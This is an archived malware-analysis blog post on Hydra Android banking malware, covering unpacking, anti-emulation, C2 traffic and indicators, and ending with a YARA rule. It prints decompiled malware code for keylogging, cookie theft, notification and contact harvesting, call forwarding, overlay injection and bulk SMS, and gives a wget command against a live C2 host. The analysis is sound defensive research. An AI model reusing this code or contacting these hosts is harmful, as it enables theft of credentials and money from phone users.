{
	"id": "21b67d83-0f5c-4da3-b09d-ef0db113a45f",
	"created_at": "2026-04-06T01:29:30.164031Z",
	"updated_at": "2026-04-10T13:11:56.922655Z",
	"deleted_at": null,
	"sha1_hash": "bec4df40e786eee71fbba54f09836acb5fe1d34f",
	"title": "Technical analysis of Hydra android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 438595,
	"plain_text": "Technical analysis of Hydra android malware\r\nBy Muhammad Hasan Ali\r\nPublished: 2022-09-20 · Archived: 2026-04-06 01:06:56 UTC\r\n11 minute read\r\nبسم الله الرحمن الرحيم\r\nFreePalestine\r\nUnpackingPermalink\r\nIf we unzip the sample and explore the AndroidManifest.xml , we see that the entry point\r\ncom.sdktools.android.MainActivity is not found in the code of the sample. This an indication of a packed\r\nsample. You can identify the packing technique using droidlysis or APKiD. If we use droidlysis , We can see\r\nthe it the sample uses DexClassLoader , malware uses JsonPacker packer. So we need to get the decrypted\r\npayload of the sample. We will use Frida to get the decrypted payload. We will install the sample on the Android\r\nstudio as an emulator and by using WSL on my host we will launch Frida to start the malicous APP to get the\r\npayload. Then we pull the payload to our host from the emulator.\r\nFigure(1) KCFj.json is our decrypted payload\r\nAnti-emulatorPermalink\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 1 of 17\n\nI tried to run the sample in the emulator such as android studio and intercept the traffic between the malware\r\nand the C2 server with Burp suite . But It didn’t go as well as my last analysis of a previous sample of Hydra\r\non my twitter. Then I used our magic tool droidlysis to get the Properties of the payload KCFj.json . I see the\r\npayload is checking if there’s an qemu emulator.\r\nFigure(2) droidlysis result for qemu detection in sample code\r\nThen I used APKiD tool to get more details of the anti-emulation technique’s code.\r\nFigure(3) APKiD result for anti-vm detection in sample code\r\nWe get the sample code for detecting VM, in SdkManagerImpl class located in com.sdktools.android.bot . If\r\none of these checks is true, then i guess the malware will act differently. The malware won’t communicate with\r\nthe C2 server to get the targeted APPs to perform the Overlay attack or to get the mirrors/domains . We will\r\nsee.\r\nprivate static boolean isEmulator() {\r\n return (Build.BRAND.startsWith(\"generic\")) \u0026\u0026 (Build.DEVICE.startsWith(\"generic\")) || (Build.FINGERPRINT\r\n }\r\nSolutionPermalink\r\nWhen I counter a sample uses anti-emulation techniques, I use tria.ge to get the traffic between the malware and\r\nthe C2 server. If you go to the previous link, you will find the communication between the malware and the C2\r\nserver. You can download the files using wget + link such as wget http://lalabanda.com/payload .\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 2 of 17\n\nFigure(4) Communication between C2 and the malware\r\nWhen we download mirrors file from http://lalabanda.com/api/mirrors , we will find encoded domains. I\r\nguess when the main C2 server is down, the malware will communicate with the mirrors or domains that we\r\ndownloaded. You can find these donmains in the IoCs section.\r\nThen we see a zip file called jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip which we can download from\r\nhttp://lalabanda.com/storage/zip/jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip . After downloading the\r\nfile and unzip it, we see it contains two folders. First contains icons and the second is inj which contains 360\r\nfolders named with the targeted APPs. Inside the folders located in inj folder, there are the html files which\r\nwill be used in the Overlay attack .\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 3 of 17\n\nFigure(5) targeted apps which contains html files to perform overlay attack\r\nPremium servicesPermalink\r\nThe malware will try to subscribe to a premium service without the knowledge of the user which will charge the\r\nSIM more money.\r\nprivate void launchUssdCode(Context context0, String s) throws Exception {\r\n this.ussdCalledTimeInMs = System.currentTimeMillis();\r\n Timber.d(\"log -\u003e [%s]\", new Object[]{s});\r\n Intent intent0 = new Intent(\"android.intent.action.CALL\", Uri.parse(\"tel:\" + s.replaceAll(\"#\", Uri.encod\r\n intent0.addFlags(0x10000000);\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 4 of 17\n\nintent0.addFlags(0x20000000);\r\n context0.startActivity(intent0);\r\n }\r\n public boolean onAccessibilityEvent(InjAccessibilityService injAccessibilityService0, AccessibilityEvent acc\r\n if(accessibilityEvent0 != null \u0026\u0026 accessibilityEvent0.getSource() != null \u0026\u0026 (s.equalsIgnoreCase(\"com.an\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n for(Object object0: accessibilityEvent0.getText()) {\r\n stringBuilder0.append(\" | \");\r\n stringBuilder0.append(((CharSequence)object0));\r\n }\r\n UssdComponent.sendPhoneNumber(stringBuilder0.toString());\r\n }\r\n return false;\r\n }\r\nSteal cookiesPermalink\r\nThe malware will try to steal Cookies from APPs such as Facebook and google .\r\npublic class CookiesReaderViewerActivityInterfaceImpl extends IScreen {\r\n public interface LifeCycleListener {\r\n boolean onPause();\r\n boolean onResume();\r\n }\r\n private InjectCookiesModel cookieModel;\r\n private LifeCycleListener lifeCycleListener;\r\n private WebView webView;\r\n public CookiesReaderViewerActivityInterfaceImpl(InjectCookiesModel injectCookiesModel0) {\r\n this.cookieModel = injectCookiesModel0;\r\n }\r\n public CookiesReaderViewerActivityInterfaceImpl(InjectCookiesModel injectCookiesModel0, LifeCycleListener co\r\n this.cookieModel = injectCookiesModel0;\r\n this.lifeCycleListener = cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0;\r\n }\r\n private void handleData(Activity activity0) {\r\n try {\r\n this.webView.clearView();\r\n String s = this.cookieModel.getFirstScreen();\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 5 of 17\n\nthis.webView.loadUrl(s);\r\n Timber.d(\"INJECTS -\u003e display file: \" + s, new Object[0]);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\n private void init() {\r\n this.webView.getSettings().setDomStorageEnabled(true);\r\n this.webView.getSettings().setMixedContentMode(0);\r\n com.sdktools.android.bot.components.injects.system.CookiesReaderViewerActivityInterfaceImpl.1 cookiesRea\r\n @Override // android.webkit.WebViewClient\r\n public void onPageFinished(WebView webView0, String s) {\r\n super.onPageFinished(webView0, s);\r\n if(s.contains(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getScreenToFinish())) {\r\n String s1 = CookieManager.getInstance().getCookie(s);\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n stringBuilder0.append(\"print event:\");\r\n stringBuilder0.append(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getFirstScre\r\n stringBuilder0.append(CookieManager.getInstance().getCookie(CookiesReaderViewerActivityInter\r\n stringBuilder0.append(\" \\n\");\r\n stringBuilder0.append(\" \\n\");\r\n stringBuilder0.append(CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getScreenToF\r\n stringBuilder0.append(CookieManager.getInstance().getCookie(CookiesReaderViewerActivityInter\r\n stringBuilder0.append(s1);\r\n if(!TextUtils.isEmpty(stringBuilder0)) {\r\n String s2 = CookiesReaderViewerActivityInterfaceImpl.this.cookieModel.getApplicationId()\r\n InjectComponent.get().getConfigsProvider().getInjectHandler().handleWebViewLog(CookiesRe\r\n }\r\n }\r\n }\r\n @Override // android.webkit.WebViewClient\r\n public boolean shouldOverrideUrlLoading(WebView webView0, String s) {\r\n Timber.d(\"INJECTS -\u003e ulr loaded: \" + s, new Object[0]);\r\n webView0.loadUrl(s);\r\n return true;\r\n }\r\n };\r\n this.webView.getSettings().setJavaScriptEnabled(true);\r\n this.webView.getSettings().setAllowFileAccess(true);\r\n this.webView.getSettings().setSaveFormData(true);\r\n this.webView.getSettings().setAppCacheEnabled(false);\r\n this.webView.getSettings().setCacheMode(2);\r\n this.webView.setBackgroundColor(0);\r\n this.webView.setWebViewClient(cookiesReaderViewerActivityInterfaceImpl$10);\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 6 of 17\n\n@Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onCreate(Activity activity0) {\r\n FrameLayout frameLayout0 = new FrameLayout(activity0);\r\n frameLayout0.setBackgroundColor(-1);\r\n WebView webView0 = new WebView(activity0);\r\n this.webView = webView0;\r\n frameLayout0.addView(webView0, new FrameLayout.LayoutParams(-1, -1));\r\n activity0.setContentView(frameLayout0);\r\n this.init();\r\n this.handleData(activity0);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onPause(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = false;\r\n LifeCycleListener cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0.onPause();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onResume(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = true;\r\n LifeCycleListener cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n cookiesReaderViewerActivityInterfaceImpl$LifeCycleListener0.onResume();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onStop(Activity activity0) {\r\n super.onStop(activity0);\r\n activity0.finish();\r\n }\r\nKeyloggerPermalink\r\nThe malware has the ability to keylog what the user enters such as password or any edittext contains a\r\nhint . Then send keylogging to the C2 server.\r\n if(accessibilityEvent0.isPassword()) {\r\n if(!s1.contains(\"•\") \u0026\u0026 !s1.contains(\"*\")) {\r\n keyLoggerModel0.setText(s1);\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 7 of 17\n\nreturn false;\r\n }\r\n if(s1.equals(accessibilityEvent0.getSource().getHintText())) {\r\n keyLoggerModel0.setText(\"\");\r\n return false;\r\n }\r\n int v = keyLoggerModel0.getText().length();\r\n if(s1.length() \u003e v) {\r\n keyLoggerModel0.addToText(Character.toString(((char)s1.charAt(s1.length() - 1))));\r\n return false;\r\n }\r\n keyLoggerModel0.removeLastFromText();\r\n return false;\r\n }\r\n keyLoggerModel0.setText(s1);\r\n }\r\n return false;\r\n }\r\n @Override // com.sdktools.android.bot.SdkComponent\r\n public void onSyncEvent(JsonObject jsonObject0) {\r\n super.onSyncEvent(jsonObject0);\r\n Boolean boolean0 = JsonUtils.hasObject(jsonObject0, \"enable_keylogger\") ? Boolean.valueOf(jsonObject0.ge\r\n if(boolean0 != null) {\r\n SharedPrefHelper.setIsKeyLoggerEnabled(this.context(), boolean0.booleanValue());\r\n }\r\n }\r\n public void onWindowStateChanged() {\r\n if(this.candidateToPass.size() \u003e 0) {\r\n this.isRequestInProgress.set(true);\r\n Log.d(\"!!!!!\", \" SEND DATA TO SERVER \" + this.candidateToPass);\r\n KeyLoggerModel keyLoggerModel0 = (KeyLoggerModel)this.candidateToPass.get(0);\r\n HashMap hashMap0 = new HashMap();\r\n hashMap0.put(\"messages\", this.candidateToPass);\r\n this.api().makePost(\"device/kl\", hashMap0).enqueue(new RestCallback() {\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onError(Throwable throwable0) {\r\n KeyLoggerComponent.this.isRequestInProgress.set(false);\r\n }\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 8 of 17\n\npublic void onSuccess(RestResponse restResponse0) {\r\n KeyLoggerComponent.this.candidateToPass.clear();\r\n KeyLoggerComponent.this.isRequestInProgress.set(false);\r\n }\r\n });\r\n }\r\n }\r\nClassic FeaturesPermalink\r\nNotification interceptingPermalink\r\nThe malware will try to intercept notification using onNotificationPosted callback located in\r\ncom.sdktools.android.bot.components.commands . The malware will intercept the comming notifications and\r\nhide them from the user. Then push/upload the content of the notification to the C2 server.\r\n public void onNotificationPosted(StatusBarNotification statusBarNotification0) {\r\n Log.i(this.TAG, \"********** onNotificationPosted\");\r\n if(SharedPrefHelper.getIsHiddenPushEnabled(this)) {\r\n this.cancelNotification(statusBarNotification0.getKey());\r\n }\r\n Notification notification0 = statusBarNotification0.getNotification();\r\n String s = notification0.extras.getString(\"android.title\");\r\n String s1 = notification0.extras.getString(\"android.text\");\r\n Timber.d(\"!!!!!\", new Object[]{\"title - \" + s + \" | description - \" + s1 + \" | app - \" + statusBarNotifi\r\n String s2 = \"Title - \" + s + \"\\nDescription - \" + s1;\r\n try {\r\n this.sendNotification(statusBarNotification0.getPackageName(), s2);\r\n }\r\n catch(Exception unused_ex) {\r\n return;\r\n }\r\n Timber.d(\"!!!!!\", new Object[]{\"cancel notification. Hidden\"});\r\n }\r\n @Override // android.service.notification.NotificationListenerService\r\n public void onNotificationRemoved(StatusBarNotification statusBarNotification0) {\r\n Timber.d(\"!!!!!\", new Object[]{\"********** onNOtificationRemoved\"});\r\n }\r\n private void sendNotification(String s, String s1) {\r\n HashMap hashMap0 = new HashMap();\r\n hashMap0.put(\"appId\", s);\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 9 of 17\n\nhashMap0.put(\"text\", s1);\r\n try {\r\n if(LockerComponent.get() != null \u0026\u0026 LockerComponent.get().api() != null) {\r\n LockerComponent.get().api().makePost(\"device/push\", hashMap0).enqueue(new RestCallback() {\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onError(Throwable throwable0) {\r\n }\r\n @Override // com.sdktools.android.bot.rest.RestCallback\r\n public void onSuccess(RestResponse restResponse0) {\r\n }\r\n });\r\n }\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nCall ForwardingPermalink\r\nThe malware can intercept calls and forward calls when the user get a phone call.\r\n public boolean onAccessibilityEvent(InjAccessibilityService injAccessibilityService0, AccessibilityEvent acc\r\n int v1;\r\n Log.d(\"OwnAccessibilityService\", \"onAccessibilityEvent -\u003e \" + accessibilityEvent0);\r\n Boolean boolean0 = Boolean.valueOf(false);\r\n if(accessibilityEvent0.getEventType() != 0x20) {\r\n return false;\r\n }\r\n if(accessibilityEvent0.getClassName().equals(\"com.android.phone.settings.SimPickerPreference\")) {\r\n if(accessibilityEvent0.getSource() == null) {\r\n return false;\r\n }\r\n this.isSecondSimActive = true;\r\n AccessibilityNodeInfo accessibilityNodeInfo0 = injAccessibilityService0.findAndGetFirstSimilar(acces\r\n if(this.currentSim == SimCard.Sim1) {\r\n injAccessibilityService0.performClick(accessibilityNodeInfo0.getChild(0), \"f\");\r\n return false;\r\n }\r\n if(this.currentSim == SimCard.Sim2) {\r\n injAccessibilityService0.performClick(accessibilityNodeInfo0.getChild(1), \"f\");\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 10 of 17\n\nreturn false;\r\n }\r\n }\r\n else if(accessibilityEvent0.getClassName().equals(\"com.android.phone.settings.GsmUmtsCallForwardOptions\"\r\n if(accessibilityEvent0.getSource() != null) {\r\n this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, accessibilityEvent0);\r\n return false;\r\n }\r\n int v = 0;\r\n while(v \u003c= 40) {\r\n if(v % 5 == 0) {\r\n injAccessibilityService0.performClick(injAccessibilityService0.getRootInActiveWindow(), \"\");\r\n }\r\n try {\r\n Thread.sleep(1000L);\r\n if(injAccessibilityService0.getRootInActiveWindow() != null) {\r\n injAccessibilityService0.getRootInActiveWindow().refresh();\r\n }\r\n boolean z = this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, accessibilit\r\n }\r\n catch(InterruptedException unused_ex) {\r\n return;\r\n }\r\n if(z) {\r\n return true;\r\n }\r\n ++v;\r\n continue;\r\n this.tryToClickXiaomiCallForwardingButton(injAccessibilityService0, accessibilityEvent0);\r\n return false;\r\n }\r\n }\r\nOverlay attackPermalink\r\nAs we see the malware will download a zip file contains html files of the targeted apps. If a targeted APP is\r\nopened then the malware will launch the html file of the targeted app. Located in\r\ncom.sdktools.android.bot.components.injects.system .\r\npublic class ViewerActivityInterfaceImpl extends IScreen {\r\n public interface LifeCycleListener {\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 11 of 17\n\nboolean onPause();\r\n boolean onResume();\r\n }\r\n public ViewerActivityInterfaceImpl(InjectModel injectModel0) {\r\n this.injectModel = injectModel0;\r\n }\r\n public ViewerActivityInterfaceImpl(InjectModel injectModel0, LifeCycleListener viewerActivityInterfaceImpl$L\r\n this.injectModel = injectModel0;\r\n this.lifeCycleListener = viewerActivityInterfaceImpl$LifeCycleListener0;\r\n }\r\n private void handleData(Activity activity0) {\r\n try {\r\n this.webView.clearView();\r\n String s = this.injectModel.getInjectPath();\r\n s = s.startsWith(\"http\") ? this.injectModel.getInjectPath() : \"file:///\" + s;\r\n this.webView.loadUrl(s);\r\n Timber.d(\"INJECTS -\u003e display file: \" + s, new Object[0]);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\n private void init() {\r\n this.webView.getSettings().setDomStorageEnabled(true);\r\n if(Build.VERSION.SDK_INT \u003e= 21) {\r\n this.webView.getSettings().setMixedContentMode(0);\r\n }\r\n com.sdktools.android.bot.components.injects.system.ViewerActivityInterfaceImpl.1 viewerActivityInterface\r\n @Override // android.webkit.WebChromeClient\r\n public boolean onConsoleMessage(ConsoleMessage consoleMessage0) {\r\n String s = consoleMessage0.message();\r\n if(!TextUtils.isEmpty(s)) {\r\n String s1 = ViewerActivityInterfaceImpl.this.injectModel.getApplicationId();\r\n InjectComponent.get().getConfigsProvider().getInjectHandler().handleWebViewLog(ViewerActivit\r\n }\r\n return super.onConsoleMessage(consoleMessage0);\r\n }\r\n };\r\n com.sdktools.android.bot.components.injects.system.ViewerActivityInterfaceImpl.2 viewerActivityInterface\r\n @Override // android.webkit.WebViewClient\r\n public boolean shouldOverrideUrlLoading(WebView webView0, String s) {\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 12 of 17\n\nTimber.d(\"INJECTS -\u003e ulr loaded: \" + s, new Object[0]);\r\n webView0.loadUrl(s);\r\n return true;\r\n }\r\n };\r\n this.webView.getSettings().setJavaScriptEnabled(true);\r\n this.webView.getSettings().setLoadWithOverviewMode(true);\r\n this.webView.getSettings().setAllowFileAccess(true);\r\n this.webView.getSettings().setSaveFormData(true);\r\n this.webView.getSettings().setAppCacheEnabled(false);\r\n this.webView.getSettings().setCacheMode(2);\r\n this.webView.setBackgroundColor(0);\r\n this.webView.setWebViewClient(viewerActivityInterfaceImpl$20);\r\n this.webView.setWebChromeClient(viewerActivityInterfaceImpl$10);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onCreate(Activity activity0) {\r\n FrameLayout frameLayout0 = new FrameLayout(activity0);\r\n frameLayout0.setBackgroundColor(-1);\r\n WebView webView0 = new WebView(activity0);\r\n this.webView = webView0;\r\n frameLayout0.addView(webView0, new FrameLayout.LayoutParams(-1, -1));\r\n activity0.setContentView(frameLayout0);\r\n this.init();\r\n this.handleData(activity0);\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onPause(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = false;\r\n LifeCycleListener viewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(viewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n viewerActivityInterfaceImpl$LifeCycleListener0.onPause();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public void onResume(Activity activity0) {\r\n InjectComponent.viewerActivityVisible = true;\r\n LifeCycleListener viewerActivityInterfaceImpl$LifeCycleListener0 = this.lifeCycleListener;\r\n if(viewerActivityInterfaceImpl$LifeCycleListener0 != null) {\r\n viewerActivityInterfaceImpl$LifeCycleListener0.onResume();\r\n }\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 13 of 17\n\npublic void onStop(Activity activity0) {\r\n super.onStop(activity0);\r\n activity0.finish();\r\n }\r\n @Override // com.sdktools.android.core.injects_core.IScreen\r\n public boolean overrideBackPress(Activity activity0) {\r\n return true;\r\n }\r\n private void startAppById(Context context0, String s) {\r\n try {\r\n context0.startActivity(context0.getPackageManager().getLaunchIntentForPackage(s));\r\n }\r\n catch(ActivityNotFoundException unused_ex) {\r\n }\r\n }\r\n}\r\nThe malware collect the contacts stored in the victim’s device and send it to C2 server. And smishing the stolen\r\nnumbers.\r\npublic static ContactsComponent get() {\r\n return ContactsComponent.instance;\r\n }\r\n private List getContactList() {\r\n ArrayList arrayList0 = new ArrayList();\r\n ContentResolver contentResolver0 = this.context().getContentResolver();\r\n Cursor cursor0 = contentResolver0.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);\r\n if((cursor0 == null ? 0 : cursor0.getCount()) \u003e 0) {\r\n while(cursor0 != null \u0026\u0026 (cursor0.moveToNext())) {\r\n String s = cursor0.getString(cursor0.getColumnIndex(\"_id\"));\r\n cursor0.getString(cursor0.getColumnIndex(\"display_name\"));\r\n if(cursor0.getInt(cursor0.getColumnIndex(\"has_phone_number\")) \u003c= 0) {\r\n continue;\r\n }\r\n Cursor cursor1 = contentResolver0.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null\r\n while(cursor1.moveToNext()) {\r\n arrayList0.add(cursor1.getString(cursor1.getColumnIndex(\"data1\")));\r\n }\r\n cursor1.close();\r\n }\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 14 of 17\n\nif(cursor0 != null) {\r\n cursor0.close();\r\n }\r\n return arrayList0;\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public Loader onCreateLoader(int v, Bundle bundle0) {\r\n return v == 1 ? this.contactsLoader() : null;\r\n }\r\n public void onLoadFinished(Loader loader0, Cursor cursor0) {\r\n this.contactsFromCursor(cursor0);\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public void onLoadFinished(Loader loader0, Object object0) {\r\n this.onLoadFinished(loader0, ((Cursor)object0));\r\n }\r\n @Override // android.app.LoaderManager$LoaderCallbacks\r\n public void onLoaderReset(Loader loader0) {\r\n }\r\n @Override // com.sdktools.android.bot.SdkComponent\r\n public void onSyncEvent(JsonObject jsonObject0) {\r\n super.onSyncEvent(jsonObject0);\r\n if(1 == (JsonUtils.hasObject(jsonObject0, \"bulk_sms\") ? jsonObject0.get(\"bulk_sms\").getAsInt() : 0)) {\r\n String s = JsonUtils.hasObject(jsonObject0, \"bulk_body\") ? jsonObject0.get(\"bulk_body\").getAsString(\r\n if(!TextUtils.isEmpty(s)) {\r\n this.sendBulkSms(s, this.getContactList());\r\n }\r\n }\r\n }\r\n private void sendBulkSms(String s, List list0) {\r\n for(Object object0: list0) {\r\n this.sendSMS(((String)object0).replace(\" \", \"\"), s);\r\n try {\r\n Thread.sleep(300L);\r\n }\r\n catch(InterruptedException unused_ex) {\r\n return;\r\n }\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 15 of 17\n\n}\r\n public void sendSMS(String s, String s1) {\r\n try {\r\n SmsManager.getDefault().sendTextMessage(s, null, s1, null, null);\r\n }\r\n catch(Exception unused_ex) {\r\n }\r\n }\r\nIoCsPermalink\r\nAPK hash: 8b321553f1a269ee4b68a02162ba2d14c71a92907b6001ff3db0fe5bae6b3430\r\nPayload (KCFj.json) hash: fd87c4f7c8ece0448dab67a0b689c4a417a153081059750295fbed29a1422b03\r\nC2 server:\r\nhttp://lalabanda.com\r\nRelated C2 servers:\r\nhttp://cslon.com\r\nhttp://cariciu-carilas.com\r\nhttp://carilas-carilas.net\r\nhttp://carilas-carilas.top\r\nYara rulePermalink\r\nrule Hydra {\r\n meta:\r\n author = \"@muha2xmad\"\r\n date = \"2022-09-21\"\r\n description = \"Hydra android malware\"\r\n version = \"1.0\"\r\n strings:\r\n $str00 = \"all_data.json\" nocase\r\n $str01 = \"res/xml/tfgztcqbitzuzb.xml\" nocase\r\n $str02 = \"res/xml/hccnqedztpvawk.xml\" nocase\r\n $str03 = \"res/xml/bkfzwlpvqlbmlh.xml\" nocase\r\n $str04 = \"com.wife.dizzy/shared_prefs\" nocase\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 16 of 17\n\ncondition:\r\n uint32be(0) == 0x504B0304 // APK file signature\r\n and ( all of ($str*))\r\n \r\n}\r\nArticle quotePermalink\r\nَتف َعُل\r\nنَت ما \r\nَّنما َأَل ِك\r\nَو\r\nَب َتتَك \r\nناَّليت َأ\r\nَلسَت الِبال َد\r\nَو\r\nَتحِمُل \r\nَلسَت ا َألسامي اَّليت \r\nَو\r\nَتر َتدي \r\nَف َلسَت الِثياَب اَّليت \r\nREFPermalink\r\ntriage report\r\nPrevious Hydra analysis\r\ndroidlysis\r\nAPKiD\r\nFrida\r\nSource: https://muha2xmad.github.io/malware-analysis/hydra/\r\nhttps://muha2xmad.github.io/malware-analysis/hydra/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://muha2xmad.github.io/malware-analysis/hydra/"
	],
	"report_names": [
		"hydra"
	],
	"threat_actors": [],
	"ts_created_at": 1775438970,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.pdf",
		"text": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.txt",
		"img": "https://archive.orkl.eu/bec4df40e786eee71fbba54f09836acb5fe1d34f.jpg"
	}
}